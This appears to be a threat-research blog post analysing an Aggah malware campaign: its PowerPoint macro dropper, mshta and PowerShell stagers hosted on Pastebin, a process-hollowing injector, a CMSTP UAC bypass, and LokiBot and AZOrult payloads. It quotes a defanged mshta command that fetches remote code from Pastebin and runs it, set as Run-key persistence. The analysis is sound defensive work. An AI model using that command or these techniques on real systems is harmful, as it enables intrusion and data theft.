During the last year, we constantly kept track of the
Recently, during our Cyber Defence monitoring operations, we spotted other attack attempts directed to some Italian companies operating in the Retail sector. For this reason, the Cybaze-Yoroi ZLab team decided to dissect this last Aggah campaign and track its latest variations.
|Brief Description||Malicious ppa file dropper with macro|
Table 1. Sample information
The initial file is a Microsoft PowerPoint PPA file. It actually is an Add-in file designed to add new behavior to the classic PowerPoint presentations, in this case to add a nasty macro:
The malicious code within the PPA abuses the Microsoft mshta utility to download a web page from the BlogSpot platform.
The parameter passed the “unescape()” function results in another two layers of encoded strings, adopting a sort of “matrioska unecape obfuscation”. After these layers, we recovered the malicious logic of the stager:
Code Snippet 1
The first part of this initial implant aims to kill the Word and Excel processes. Immediately after that, the malware downloads other code through leveraging mshta once again, this time from a pastebin snippet.
The author of this pastes is no more “HAGGA”, as seen in our previous analysis, now the he moved to another one: “YAKKA3”:
The paste was created on the 25th November 2019 and it has likely been edited many times in the course the last month. In the past Aggah was frequently changing the content of his pastes to modify the malware behaviour and drop many kinds of malware. On some occasions, some of them suspected to be related to the Gorgon APT group. Anyway, during the analysis, the content of the encoded string is the following:
Code Snippet 2
The above script is a piece of VBS script designed to run some other Powershell loader. The powershell script tests the internet connectivity by pinging to google.com and then starts the infection. The script downloads two other pastes. The first is a PE file and the second one is a custom .NET process injection utility.
|Brief Description||Injector through process hollowing|
Table 2. Sample information of the injector
The injector component is invoked through its static method “[vroombrooomkrooom]::kekedoyouloveme(‘calc.exe’,$f)”, as seen in the code snippet 2. The only purpose of this component is to inject a payload inside the memory of another one process, as indicated in the parameter.
The injection technique is very basic. In fact the injection uses the textbook “CreateRemoteThread” technique, well documented and used actively implemented by many actors and malware developers.
In Code Snippet 1 we saw that the aggah implant persists on the target machine by setting the “mshta http:[\\pastebin.]com\raw\NxJCPTmQ” command into the Registry Key “HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Pastemm”, so, it potentially loads different payloads on every run.
Unlike previous pastes, the author of this one is YAKKA4. Probably, a form of redundancy in case of take down of the other accounts.
Anyway, the code served by this paste downloads another binary file from an additional Paste site: paste.ee.
Code Snippet 3
This last binary actually is a hacking tool implementing the CMSTP Bypass technique, a technique used to bypass Windows UAC prompts.
According to the Microsoft Documentation, “Connection Manager is a suite of components that provides administrators with the ability to create and distribute customized remote access connections and to create, distribute, and automatically update customized phone books.”.
However, the cyber attackers could exploit an infected INF file to execute arbitrary commands bypassing the UAC, elevating privileges in a stealthy way. In this case the CMSTP Bypass technique implemented into a .NET executable.
As we saw in the past, Aggah used to change its payloads during time, and this time we observed that the delivered malware was not RevengeRAT. It rather was a LokiBot variant. This info stealer is well-known in the community since 2016 and it was deeply analyzed in the course of the years.
In this case, it has the following configuration:
As anticipated before, Aggah payloads are quite dynamic. According to the some observation of community researches such as @DrStache, the Aggah pastebin accounts were dropping AZOrult infostealer few days before the Lokibot observation.
Investigating the c2 infrastructure through the Azorult-Tracker services, we noticed the AZOrult malware distributed by Aggah in that period was targeting a modest number of victims mainly located in the United States, United Arab Emirates and also Pakistan, Germany and Israel.
The Aggah actor keeps threatening organizations all around the world. During the time it built a custom stager implant based on legit third parties services, such as Pastebin and BlogSpot, abused by the actor to manage the infected hosts and to run its botnet without renting a server.
During the last year we contributed to the joint effort to track its activities, along with PaloAlto’s Unit42, and after a year we can confirm it is still active and dangerous. At the moment it is not clear if this actor is just selling its hacking services or running its own campaigns, or both.
In conclusion, there is no hard evidence confirming or denying its potential relationships with the Gorgon APT, and factors like the different nationalities and the small amount of victims connected to December Aggah activities, does not help to exclude it.
Further technical details, including Indicators of Compromise (IoCs) and Yara rules, are reported in the analysis published by Yoroy-Cybaze Z-Lab:
Necessary cookies are absolutely essential for the website to function properly. This category only includes cookies that ensures basic functionalities and security features of the website. These cookies do not store any personal information.
Any cookies that may not be particularly necessary for the website to function and is used specifically to collect user personal data via analytics, ads, other embedded contents are termed as non-necessary cookies. It is mandatory to procure user consent prior to running these cookies on your website.